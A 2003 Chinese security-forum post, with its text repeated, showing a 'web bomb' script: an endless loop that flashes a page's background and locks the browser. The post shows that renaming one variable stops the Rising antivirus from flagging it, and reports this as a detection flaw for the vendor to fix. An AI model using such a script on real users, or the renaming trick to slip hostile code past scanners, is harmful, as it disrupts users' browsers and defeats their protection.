|
 | 作者: wkbsb [wkbsb]
 论坛用户 |
登录 |
| 测试环境:瑞星杀毒软件 */网页炸弹源代码*/ <SCRIPT> var color = new Array; color[1] = "black"; color[2] = "white"; for(x = 0; x <3; x++) { document.bgColor = color[x] if(x == 2) { x = 0; } } </SCRIPT> */网页炸弹源代码*/ */这个是我自己修改过后的源代码*/ <SCRIPT> var wkbsb = new Array; wkbsb[1] = "black"; wkbsb[2] = "white"; for(x = 0; x <3; x++) { document.bgColor = wkbsb[x] if(x == 2) { x = 0; } } </SCRIPT> 把它们生成两个*.htm,你会发现两个文件的效果是一样的。可为什么第一个会被瑞星的病毒监控发现为病毒名为Script.killie5的病毒呢?而第二个就不会发现有病毒呢?大家仔细的看一下这两个源代码,你们会发现有什么不同了。原来这个两个源代码的变量名不同,原来瑞星的病毒监控只是认变量而不认代码的破坏能力的。不然你打开记事本把“var color = new Array;”复制到记事本里再另存为test.htm文件,瑞星的病毒监控就会发现有病毒了。 我的测试环境是在瑞星杀毒软件,没有在其他的杀毒软件下测试,有兴趣的朋友可以用别的杀毒软件测试一下。 我希望瑞星杀毒软件能改进这一点,不然对病毒的发现的错误率会高。 版权所有:wkbsb CopyRight (C) 2003 TomyDan网络工作室 http://www.tomydan.net 测试环境:瑞星杀毒软件 */网页炸弹源代码*/ <SCRIPT> var color = new Array; color[1] = "black"; color[2] = "white"; for(x = 0; x <3; x++) { document.bgColor = color[x] if(x == 2) { x = 0; } } </SCRIPT> */网页炸弹源代码*/ */这个是我自己修改过后的源代码*/ <SCRIPT> var wkbsb = new Array; wkbsb[1] = "black"; wkbsb[2] = "white"; for(x = 0; x <3; x++) { document.bgColor = wkbsb[x] if(x == 2) { x = 0; } } </SCRIPT> 把它们生成两个*.htm,你会发现两个文件的效果是一样的。可为什么第一个会被瑞星的病毒监控发现为病毒名为Script.killie5的病毒呢?而第二个就不会发现有病毒呢?大家仔细的看一下这两个源代码,你们会发现有什么不同了。原来这个两个源代码的变量名不同,原来瑞星的病毒监控只是认变量而不认代码的破坏能力的。不然你打开记事本把“var color = new Array;”复制到记事本里再另存为test.htm文件,瑞星的病毒监控就会发现有病毒了。 我的测试环境是在瑞星杀毒软件,没有在其他的杀毒软件下测试,有兴趣的朋友可以用别的杀毒软件测试一下。 我希望瑞星杀毒软件能改进这一点,不然对病毒的发现的错误率会高。 版权所有:wkbsb CopyRight (C) 2003 TomyDan网络工作室 http://www.tomydan.net |
| 地主 发表时间: 09/11 12:15 |
 | 回复: xiaofashi [xiaofashi]  论坛用户
|
登录 |
|
SDFSDFSF |
| B1层 发表时间: 09/26 22:48 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 奇怪的发现